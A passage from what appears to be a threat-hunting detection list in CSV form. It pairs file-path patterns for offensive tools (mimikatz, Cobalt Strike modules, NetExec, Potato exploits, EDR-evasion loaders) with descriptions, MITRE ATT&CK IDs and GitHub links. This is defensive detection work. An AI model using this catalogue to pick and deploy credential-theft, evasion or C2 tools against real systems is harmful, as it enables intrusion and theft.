It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*\GoFetchLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*\GoodSync-2*-*.log*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*\goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" 
+"*\GPOddity\*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*\gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\group_members.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*\Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*\groupmembership.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*\HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z"
+"*\Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*\hades.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*\hades-main.zip*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*\handlekatz.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\harvest.cmb*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
+"*\hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*\HiddenDesktop\*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*\hijackers\*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*\HijackHunter\*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\hoaxshell\*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*\HookDetector.csproj*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z"
+"*\HTMLSmuggler\*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z"
+"*\huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z"
+"*\HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*\HWSyscalls-Example.*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*\hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\Hypnos.exe*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
+"*\Hypnos.sln*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
+"*\Hypnos.vcxproj*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
+"*\Hypnos-main\*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
+"*\icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*\IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z"
+"*\iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
+"*\impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*\impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Implant.exe *","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z"
+"*\implant.exe *.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z"
+"*\ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\InactiveDomainAdmins.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z"
+"*\inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*\injector.ps1 1 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*\injector.ps1 2 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*\install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Inveigh.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*\inveigh.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\Inveigh\bin\*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*\IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - 
Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\ipscan-*-setup.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan221.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan-crash.txt*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*\Ivy\Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA 
(macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*\Ivy\Loader\*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*\JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*\JunctionFolder.csproj*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\katz.ps1*","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\kdstab.exe*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender 